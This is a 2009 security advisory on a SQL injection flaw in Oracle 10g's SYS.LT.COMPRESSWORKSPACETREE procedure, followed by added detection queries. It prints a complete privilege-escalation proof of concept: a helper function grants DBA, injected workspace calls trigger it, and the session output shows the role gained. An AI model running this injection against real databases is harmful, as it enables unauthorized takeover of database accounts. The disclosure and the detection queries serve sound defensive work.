Oracle 10g SYS.LT.COMPRESSWORKSPACETREE SQL Injection Exploit
Details

The COMPRESSWORKSPACETREE procedure is owned by SYS or by WMSYS (depending on the Oracle version). A user who can call this procedure can pass malicious code to it, execute PL/SQL statements and elevate privileges as if the user were the package owner.

Example

Example written by Alexandr "Sh2kerr" Polyakov

    SQL> select * from user_role_privs;

    USERNAME                       GRANTED_ROLE                   ADM DEF OS_
    ------------------------------ ------------------------------ --- --- ---
    OUTLN                          CONNECT                        NO  YES NO
    OUTLN                          RESOURCE                       NO  YES NO

    SQL> CREATE OR REPLACE FUNCTION X return varchar2
      2  authid current_user as
      3  pragma autonomous_transaction;
      4  BEGIN
      5  EXECUTE IMMEDIATE 'GRANT DBA TO OUTLN';
      6  COMMIT;
      7  RETURN 'x';
      8  END;
      9  /

    Function created.

    SQL> exec SYS.LT.CREATEWORKSPACE('zz'' and outln.X()=''x')

    PL/SQL procedure successfully completed.

    SQL> exec SYS.LT.REMOVEWORKSPACE('zz'' and outln.X()=''x')

    PL/SQL procedure successfully completed.

    SQL> select * from user_role_privs;

    USERNAME                       GRANTED_ROLE                   ADM DEF OS_
    ------------------------------ ------------------------------ --- --- ---
    OUTLN                          CONNECT                        NO  YES NO
    OUTLN                          DBA                            NO  YES NO
    OUTLN                          RESOURCE                       NO  YES NO

Patch Information

Apply the latest Oracle Security patches (e.g. CPU April 2009)

History

13-jan-2009 Oracle published CPU April 2009 [CVE-2009-0981]
14-apr-2009 Oracle published CPU April 2009 [CVE-2009-0981]
14-apr-2009 Advisory published

© 2009 by Red-Database-Security GmbH - last update 19-jun-2009
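The following data-dictionary queries are an added example, not part of the original advisory or of Oracle's patch: they review a database for the end state and the helper-function pattern shown in the session above. They assume a DBA-privileged SQL*Plus session; the list of excluded owners in the third query is an assumption to adjust per site.

```sql
-- Added example (not from the advisory). Run as a DBA-privileged account.

-- 1. Accounts holding the DBA role. The advisory's session ends with OUTLN
--    listed here; any grantee outside the approved administrator list
--    should be reviewed and the role revoked if it is not expected.
SELECT grantee, granted_role, admin_option, default_role
  FROM dba_role_privs
 WHERE granted_role = 'DBA'
 ORDER BY grantee;

-- 2. Accounts allowed to execute the LT package (owned by SYS or WMSYS,
--    depending on the Oracle version). A grant to PUBLIC means every
--    database user can reach the procedures until the CPU is applied.
SELECT owner, table_name, grantee, privilege, grantable
  FROM dba_tab_privs
 WHERE table_name = 'LT'
   AND owner IN ('SYS', 'WMSYS')
   AND privilege = 'EXECUTE'
 ORDER BY owner, grantee;

-- 3. Stored code outside the Oracle-maintained schemas that issues a
--    dynamic GRANT from an autonomous transaction, the shape of the
--    helper function X in the session above.
--    Assumption: the excluded owner list below; extend it per site.
SELECT s.owner, s.name, s.type, s.line, s.text
  FROM dba_source s
 WHERE UPPER(s.text) LIKE '%EXECUTE IMMEDIATE%GRANT%'
   AND s.owner NOT IN ('SYS', 'SYSTEM', 'WMSYS')
   AND EXISTS (SELECT 1
                 FROM dba_source a
                WHERE a.owner = s.owner
                  AND a.name  = s.name
                  AND a.type  = s.type
                  AND UPPER(a.text) LIKE '%AUTONOMOUS_TRANSACTION%')
 ORDER BY s.owner, s.name, s.line;
```

An empty result from the third query does not prove the database is clean, because the helper function can be dropped after use; the first query is the durable indicator.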